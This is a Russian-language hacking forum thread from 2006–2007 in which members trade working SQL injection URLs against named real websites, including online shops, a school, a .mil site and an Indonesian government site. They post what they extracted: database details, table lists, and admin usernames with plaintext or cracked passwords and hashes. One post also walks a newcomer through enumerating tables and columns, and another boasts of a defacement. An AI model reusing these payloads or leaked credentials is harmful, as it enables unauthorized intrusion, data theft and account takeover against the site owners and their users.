SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    Там 5 скул....базы мона прочитать ) их 125...но та которую ты я думаю ищешь ibf_members
     
  2. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.surcon.ru/pages.php?id=13+union+select+1,concat_ws(0x2F,version(),user(),database()),concat_ws(0x2F,login,password,id),4,5+from+users/*
    Данные: 4.0.25-standard/[email protected]/vodos68_surcon

    Админки

    Login: admin | Password: 1222appex
    Login: seva | Password: 123456
    Login: sdg34 | Password: 123542
     
    1 person likes this.
  3. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.shark.ru/page.php?id=-16+union+select+1,2,convert(concat(load_file(0x2f6574632f706173737764)),binary),concat_ws(0x2F,user(),version(),database()),5,6,7,8,9,10+from+mysql.user/*
    Данные: root@localhost/4.0.22-standard/sharkid

    root*
     
    1 person likes this.
  4. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    vel-bg.com
    Code:
    http://www.vel-bg.com/catalog.php?cat=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
    5.0.45-community-log:velbgc_chinafood:velbgc_root@localhost

    37 таблиц:
    Code:
    http://www.vel-bg.com/catalog.php?cat=-1+union+select+table_name+from+information_schema.tables+limit+36,1/*
    4 root-a:
    Code:
    http://www.vel-bg.com/catalog.php?cat=-1+union+select+concat_ws(0x3a,USER_NAME,PASS,NAME)+from+users+limit+3,1/*
    USER_NAME:pASS:NAME

    vesi:*8BB36E3127C76C9AD9FBD075975489D08E1C5B44:веси
    svetlio:*4A59E59650A8409075084B2048625BD1BE8711A8:Светльо
    kami:*032197AE5731D4664921A6CCAC7CFCE6A0698693:ками
    sasho:*DEE38E52FC4DD0B60096749662F3F76F2BE8E0AA:сашо
     
    1 person likes this.
  5. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://gimnazjum4.edu.tubaza.net/comment.php?what=news&id=378+UNION+SELECT+1,2,pass,4,5,6,7,nick,9+FROM+admins+limit+2,1/*
    БД 5.
     
  6. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.paintball.ru/next.php?id=999+union+select+1,2,concat_ws(char(58,58),id,pass,username)+from+pb_users+where+id=1/*
    Админов море вот 2 главных...

    APG - Передовая пароль kr3Bx
    Черная Метка пароль 953z6
     
  7. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.mediasoyuz.ru/news/index.php?id=-66+union+select+1,version(),3,concat_ws(user(),char(58),database()),5,6,7,8,9,10,11,12/*
    a5361_media@localhosta5361_media
     
  8. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    http://osnews.com/

    HTML:
    http://67.18.254.190/permalink.php?news_id=11384&comment_id=10824+union+select+concat(username,0x2b,password)+FROM+users/*
     
  9. Evgesha23

    Evgesha23 New Member

    Joined:
    3 Jun 2007
    Messages:
    17
    Likes Received:
    3
    Reputations:
    0
    _http://www.deti.biz
    Code:
    http://www.deti.biz/product.php?s=1&a00=-1+union+select+concat(version(),0x3a,data base(),0x3a,us er()),2,3/*
    5.0.45-community-log;detibizo_deti;detibizo_deti@localhost
    Code:
    http://www.deti.biz/product.php?s=1&a00=-1+union+select+TABLE_NA ME,2 ,3+from+INFO RMATION_SCHEMA.TABLES+LIMIT+94,1/*
    94 таблицы
    интересные:users ,users_roll ,sh_user и тд
     
    #3669 Evgesha23, 12 Nov 2007
    Last edited: 12 Nov 2007
    2 people like this.
  10. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    Не знаю что дальше с этим делать... HELP!
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),7,8,9,10,11,12,13,14/*
     
  11. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    Я думаю тебя смутило это "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'"
    Но все просто:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,concat(0x2b,0x2b,0x2b),aES_DECRYPT(AES_ENCRYPT(version(),0x72),0x72),%208,9,10,11,12,13,14/*
    AES_DECRYPT(AES_ENCRYPT('строка'),'blabla'),'blabla') Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.
     
    3 people like this.
  12. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Смотрим версию:
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x20),0x20),7,8,9,10,11,12,13,14/*
    Ну и начинай таблички подбирать
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*
    Заменяя [имя_таблицы] на имя которое возможно будет реальным названием одной из таблиц типа user, users, members и тд небольшой словарик подобного можешь найти воспользовавшись поиском...

    После начинай перебирать столбцы
    Code:
    http://www.euro26.ee/www/sisu.php?id=3&page=-1+union+select+1,2,3,4,5,[имя_столбца],7,8,9,10,11,12,13,14 FROM [имя_таблицы]/*
    по аналогии с предыдущим примером

    Ну а дальше опять спросишь...

    ЗЫ вообще для таких постов есть специальная тема http://forum.antichat.ru/thread46016.html
    ЗЫЫ и когда научимся читать статьи по интересующей теме их же не для себя писали так?
     
    1 person likes this.
  13. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    flaghouse.com
    Code:
    http://www.flaghouse.com/itemdy00.asp?T1=38525'%20or%201=@@version--&iorb=4764
    version: Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
    system_user: ecomlive
    db_name: Ecomlive

    americanmemorabilia.com
    Code:
    http://www.americanmemorabilia.com/Auction_Item.asp?Auction_ID=25746+or+1=@@version--
    version: Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
    user: AmerMem
    db: AmericanMemorabilia

    gamerevolution.com
    Code:
    http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),version(),user(),database()),4,5,6,7,8,9,0,11+--+
    4.1.21-standard-log:[email protected]:gamerev
    Code:
    http://www.gamerevolution.com/manifesto/view.php?id=-193+union+select+1,2,concat_ws(char(58),username,user_password,user_icq,user_email),4,5,6,7,8,9,0,11+from+phpbb_users+limit+12,1+--+
    dUKE:eea342a57c9313484e2b73715a5cbdb1:froggy
    В саму админку попасть не удалось, там стоит дополнительная авторизация
     
    3 people like this.
  14. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    mil

    www.esi.mil

    POST Инъекция в поле email:
    Code:
    http://www.esi.mil/forgotPassword.asp
    version:
    Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    user:esi2005admin
    db:ESI2005

    Базы:
    Code:
    DONCIODashboard
    DONCIOInternetDB
    EmailSurvey
    ESI2005
    
    ESI2005(Таблы)
    Code:
    AgreementType
    AgreementTypeLookup
    Audit
    Contacts
    DesignatedCategory
    Final_Price
    ManufacturerLookup
    Questions
    Requirement_Files
    Requirement_Specs
    Requirements_Changes
    Software_Managers
    Software_Products
    Status
    tblProducts
    tblForum
    tblESA
    
    Интересная Contacts:
    Code:
    idKey
    sName
    sEmail
    sPassword
    Например:
    [email protected]:ESI8524R
     
    4 people like this.
  15. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    labootika.com
    Code:
    http://www.labootika.com/catalog.php?idproduit=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9/*&cat=1012&PHPSESSID=397829af48e28835dd7cc832800fcad9
    4.0.25-standard-log:labootik:[email protected]

    доступ к mysql прикрыт

    perlasuferintei.ro
    Code:
    http://www.perlasuferintei.ro/catalog.php?mod=detaliiCarte&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12/*
    4.0.27-standard : perla_perlasuferintei : perla@localhost

    maxishop.lv
    Code:
    http://www.maxishop.lv/?p=prece&id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sad=5
    4.1.16:maxishoputf:maxishoputfuser@localhost

    и снова прикрыт доступ к mysql :mad:
     
  16. DJ_Bes

    DJ_Bes Member

    Joined:
    8 Nov 2007
    Messages:
    1
    Likes Received:
    8
    Reputations:
    -5
    Сообственно http://www.dom3.ru/blog/view/-5867')+union+select+'hfd'/*/0/196/
    + мне ))ыы
     
    8 people like this.
  17. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    bazar.glo-con.com
    Code:
    http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+concat_ws(0x3a,version(),database(),user())/*&for_sale=Y
    109 таблиц:
    Code:
    http://bazar.glo-con.com/it/property_directory.php?region_code=46&country_code=-1+union+select+table_name+from+information_schema.tables+limit+109,1/*&for_sale=Y
    Поля таблы admin_logins:
    Code:
    idlogin
    ida
    logip
    timelog
    hashcode
    Поля таблы user_logins:
    Code:
    idlogin
    customer_code
    logip
    timelog
    hashcode
     
    4 people like this.
  18. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    www.royalvideo.ru (продажа фотоаппаратов)
    PHP 5.2.4, MySQL 5.0.45-log

    Таблица users Колонки: login, id, pass
    md5(pass) = d9d1b168eac8f197e0576b56cfc23ece
    login:pass = admin:d9d1b168eac8f197e0576b56cfc23ece
    d9d1b168eac8f197e0576b56cfc23ece:gfhjkm = расшифровал на www.milw0rm.com/md5/info.php
    админка : http://www.royalvideo.ru/admin/index.php
    был дефейс но ненадолго, часа 3-4.
    так же через админку вычитал настроки к БД:

     
    1 person likes this.
  19. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Нашел скуль-инж, вывел хэш админа, но админку не нашел! Нашел только cpanel =) ыыы

    SQL-inj:
    Code:
    http://www.pariaman.go.id/berita/index.php?id=-1+union+select+1,version(),3,4,5,now(),7,8,9
    ...

    CPanel:
    Code:
    http://www.pariaman.go.id/cpanel
    Хеш:пароль админа:
    0192023a7bbd73250516f069df18b500:admin123

    Админку не нашел =(
     
    3 people like this.
  20. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(admin,0x2b,pass,0x2b,nick,0x2b,icq),6,7,8,9,10+from+users/*
    HTML:
    http://www.jajca.net/sms.php?id=-1%20union%20select%201,2,3,4,concat(nick,0x2b,pass),6,7,8,9,10+from+admins/*

    HTML:
    http://www.trinitrader.com/product_desc.php?id=121+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+trader_db_admin/*
     
    #3680 KEHT33, 13 Nov 2007
    Last edited: 13 Nov 2007
    1 person likes this.
Thread Status:
Not open for further replies.